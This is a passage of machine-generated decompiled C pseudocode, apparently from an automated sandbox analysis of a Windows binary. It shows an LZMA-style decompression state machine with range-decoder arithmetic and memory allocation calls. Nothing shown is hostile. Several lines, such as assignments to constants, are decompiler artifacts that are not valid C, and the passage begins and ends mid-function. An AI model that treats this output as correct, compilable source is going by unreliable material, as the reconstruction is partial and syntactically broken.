                      												GlobalFree( *(_t613 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t613 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t45 = _t613 - 0x48;
                      											 *_t45 =  *(_t613 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t613 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t613 - 0x40);
                      											if(_t546 ==  *(_t613 - 0x74)) {
                      												L20:
                      												 *(_t613 - 0x48) = 5;
                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t613 - 0x74) = _t546;
                      											if( *(_t613 - 8) != 0) {
                      												GlobalFree( *(_t613 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      											 *(_t613 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      											 *(_t613 - 0x84) = 6;
                      											 *(_t613 - 0x4c) = _t553;
                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      											 *(_t613 - 0x54) = _t606;
                      											goto L133;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											_t67 = _t613 - 0x70;
                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      											if( *(_t613 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t606;
                      											_t589 = _t531 & 0x0000ffff;
                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      											if( *(_t613 - 0xc) >= _t565) {
                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      												 *(_t613 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												 *_t606 = _t532;
                      											} else {
                      												 *(_t613 - 0x10) = _t565;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      											}
                      											if( *(_t613 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											}
                      										case 5:
                      											goto L137;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											while(1) {
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											}
                      										case 8:
                      											goto L0;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L89;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t258;
                      											0 | _t258 = _t258 + _t258 + 9;
                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      											goto L75;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L88;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L88:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L89:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												goto L58;
                      											}
                      										case 0x10:
                      											L109:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t365 = __ebp - 0x70;
                      											 *_t365 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t365;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L111;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											while(1) {
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											}
                      										case 0x12:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 0x58);
                      												 *(__ebp - 0x84) = 0x13;
                      												__esi =  *(__ebp - 0x58) + 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											__eflags = __eax;
                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                      											goto L130;
                      										case 0x13:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												L144:
                      												 *(__ebp - 0x7c) = 0x14;
                      												goto L145;
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											L130:
                      											 *(__ebp - 0x58) = __eax;
                      											 *(__ebp - 0x40) = 3;
                      											goto L144;
                      										case 0x14:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											 *(_t613 - 0x88) = _t533;
                      											goto L1;
                      										case 0x15:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L120;
                      										case 0x16:
                      											__eax =  *(__ebp - 0x30);
                      											__eflags = __eax - 4;
                      											if(__eax >= 4) {
                      												_push(3);
                      												_pop(__eax);
                      											}
                      											__ecx =  *(__ebp - 4);
                      											 *(__ebp - 0x40) = 6;
                      											__eax = __eax << 7;
                      											 *(__ebp - 0x7c) = 0x19;
                      											 *(__ebp - 0x58) = __eax;
                      											goto L145;
                      										case 0x17:
                      											L145:
                      											__eax =  *(__ebp - 0x40);
                      											 *(__ebp - 0x50) = 1;
                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      											goto L149;
                      										case 0x18:
                      											L146:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x18;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t484 = __ebp - 0x70;
                      											 *_t484 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t484;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L148:
                      											_t487 = __ebp - 0x48;
                      											 *_t487 =  *(__ebp - 0x48) - 1;
                      											__eflags =  *_t487;
                      											L149:
                      											__eflags =  *(__ebp - 0x48);
                      											if( *(__ebp - 0x48) <= 0) {
                      												__ecx =  *(__ebp - 0x40);
                      												__ebx =  *(__ebp - 0x50);
                      												0 = 1;
                      												__eax = 1 << __cl;
                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      												__eax =  *(__ebp - 0x7c);
                      												 *(__ebp - 0x44) = __ebx;
                      												while(1) {
                      													 *(_t613 - 0x88) = _t533;
                      													goto L1;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x50);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      											__eax =  *(__ebp - 0x58);
                      											__esi = __edx + __eax;
                      											 *(__ebp - 0x54) = __esi;
                      											__ax =  *__esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												__cx = __ax >> 5;
                      												__eax = __eax - __ecx;
                      												__edx = __edx + 1;
                      												__eflags = __edx;
                      												 *__esi = __ax;
                      												 *(__ebp - 0x50) = __edx;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L148;
                      											} else {
                      												goto L146;
                      											}
                      										case 0x19:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												 *(__ebp - 0x2c) = __ebx;
                      												L119:
                      												_t393 = __ebp - 0x2c;
                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t393;
                      												L120:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t400 = __ebp - 0x60;
                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t400;
                      												goto L123;
                      											}
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L102:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L108:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L112:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														_t391 = __ebp - 0x2c;
                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t391;
                      														goto L119;
                      													}
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L111:
                      														_t368 = __ebp - 0x48;
                      														 *_t368 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t368;
                      														goto L112;
                      													} else {
                      														goto L109;
                      													}
                      												}
                      												__ecx =  *(__ebp - 0xc);
